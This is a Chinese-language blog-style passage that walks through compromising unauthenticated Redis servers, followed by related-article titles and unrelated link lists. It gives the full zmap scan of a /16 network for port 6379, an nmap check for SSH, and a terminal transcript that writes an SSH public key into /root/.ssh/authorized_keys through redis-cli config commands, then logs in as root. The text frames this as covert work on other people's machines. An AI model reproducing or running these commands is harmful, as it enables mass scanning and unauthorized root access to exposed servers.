先上 zmap 这个大杀器大范围找安装 redis 服务的机器,aaa.bbb.0.0 是计划扫描的网络。

$ zmap -B 1M -p 6379 aaa.bbb.0.0/16 -o results.csv

然后根据 results.csv 的结果来逐个排查,注意要能 ssh 登录的。

$ cat results.csv | xargs nmap -p 22

最后找一个隐蔽环境,开始干活,aaa.bbb.ccc.ddd 是目标地址:

root@ab871b39330f:~# ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Created directory '/root/.ssh'.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
f8:d1:b2:bc:d9:13:13:3d:de:6d:6e:27:bf:28:28:72 root@ab871b39330f
The key's randomart image is:
+---[RSA 2048]----+
|                 |
|                 |
|           .     |
|       . .. o    |
|      . S .o o . |
|       o +o . . o|
|        + .o   o |
|     . E =..  o +|
|      o + .... =+|
+-----------------+
root@ab871b39330f:~# (echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") | redis-cli -h aaa.bbb.ccc.ddd -x set crackit
OK
root@ab871b39330f:~# redis-cli -h aaa.bbb.ccc.ddd
aaa.bbb.ccc.ddd:6379> config set dir /root/.ssh/
OK
aaa.bbb.ccc.ddd:6379> config get dir
1) "dir"
2) "/root/.ssh"
aaa.bbb.ccc.ddd:6379> config set dbfilename "authorized_keys"
OK
aaa.bbb.ccc.ddd:6379> save
OK
aaa.bbb.ccc.ddd:6379> exit
root@ab871b39330f:~# ssh root@aaa.bbb.ccc.ddd
The authenticity of host 'aaa.bbb.ccc.ddd (aaa.bbb.ccc.ddd)' can't be established.
RSA key fingerprint is 0c:9d:60:e6:24:51:07:4d:93:0f:f3:4e:cb:12:ae:43.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'aaa.bbb.ccc.ddd' (RSA) to the list of known hosts.
Last login: Tue Sep 29 15:20:10 2015 from 202.115.16.136
[root@mscopyright1 ~]# pwd
/root

Redis 未授权访问漏洞利用相关推荐

  1. redis未授权访问漏洞利用

    redis是一个key-value存储系统,拥有强大的功能,目前普及率很高,redis是用ansic语言编写,支持网络.可基于内存亦可持久化的日志型.Key-Value数据库,并提供多种语言的APL, ...

  2. 【渗透】Redis 未授权访问漏洞利用(三种利用方式)

    起序:是因为我同学的云服务器被黑了,被挖矿了,原因就是 redis 可以未授权访问,还是 root 级别的,我直接好家伙,整理记录一下. 一.软件环境 虚拟机:VMware Workstation 1 ...

  3. 未授权访问漏洞-Redis未授权访问漏洞

    文章目录 未授权概述 常见未授权访问漏洞 Redis未授权访问 Redis简介 应用场景 Redis 架构 漏洞发现 端口 端口探测 Redis常用命令 Redis历史漏洞 Redis未授权访问 Re ...

  4. Redis未授权访问漏洞的重现与利用

    前言: 最近配置openvas的时候安装了redis,听说曾经曝出过一个未授权访问漏洞,便找了一下相关资料想自己动手复现一下漏洞的利用过程,当然所有的攻击性操作都是在虚拟机上完成的,本文所有的操作是在 ...

  5. Redis未授权访问漏洞的利用及防护

    什么是Redis未授权访问漏洞? Redis在默认情况下,会绑定在0.0.0.0:6379.如果没有采取相关的安全策略,比如添加防火墙规则.避免其他非信任来源IP访问等,这样会使Redis服务完全暴露 ...

  6. Redis未授权访问漏洞记录(端口:6379)

    目录 Redis 扫描 未授权登录以及利用 写入SSH公钥,进行远程登录 定时任务反弹shell 写入一句话木马 其它一句话木马 ​ 写入/etc/passwd文件 利用主从复制RCE ​ 本地Red ...

  7. Redis未授权访问漏洞详细版

    Redis未授权访问漏洞 Redis未授权访问漏洞原理 Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样 ...

  8. 漏洞检测与防御:Redis未授权访问漏洞复现

    漏洞检测与防御:Redis未授权访问漏洞复现 1. 未授权访问漏洞 未授权访问漏洞可以理解为安全配置.权限认证.授权页面存在缺陷,导致其他用户可以直接访问,从而引发权限可被操作,数据库.网站目录等敏感 ...

  9. ZooKeeper 未授权访问漏洞利用

    点击"仙网攻城狮"关注我们哦~ 不当想研发的渗透人不是好运维 让我们每天进步一点点 简介 ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,它是一个为分布式应用提 ...

最新文章

  1. 【Smart_Point】C/C++ 中独占指针unique_ptr
  2. 《c++语言导学》——1.7 常量
  3. 商品的包装(外贸知识二)
  4. android xml png,android - 使用.png文件中的形状创建xml聊天气泡 - 堆栈内存溢出
  5. 3.2 python实战_线性回归的梯度下降法
  6. android UI设计时须要注意遵循的设计原则
  7. 4代hiv检测50元_别瞧不起国货!这4个姥姥辈的护肤品,真心好用,还不到50元
  8. 泊松分酒 java课件_泊松分酒原理 - 我类个擦的个人空间 - OSCHINA - 中文开源技术交流社区...
  9. sql慢查询问题排查
  10. 关于cookie使用的几个方法
  11. android modem开发(16)---MTK语音测试
  12. C#操作Word(转)0
  13. Vmware 安装 Fedora 18 注意事项
  14. 自己的网站被劫持跳转时该怎么解决?
  15. 电脑开始菜单没有了关机选项,怎么办
  16. 基于商品属性的相似度模型
  17. 【gym 101991 E】(ACPC 2018) E. Exciting Menus 题解
  18. 上市公司竞争度衡量指标集1990-2020年(含数据处理过程)
  19. QTableView 去除Item选中的虚线框
  20. 微信小程序连接本地服务器(在本地服务器上进行真机测试-微信开发者工具)

热门文章

  1. 下载软件的临时文件思路和实现
  2. $$\int_0^{nh}x(x-h)\cdots (x-nh)dx=h^{n+2}\int_0^nx(x-1)\cdots (x-n)dx$$
  3. 数据类型的小小研究:Access与SQL Server的数据类型
  4. Launcher启动的流程图【AndroidICS4.0——Launcher系列四】
  5. 《『若水新闻』客户端开发教程》——03.设计新闻分类UI(1)
  6. 125条常见的java面试笔试题大汇总3
  7. [] ubuntu 14.04 搜狗拼音输入法安装
  8. 自定义video控制栏,移动端可行
  9. java --微信支付2
  10. CSS3秘笈复习:第一章第二章第三章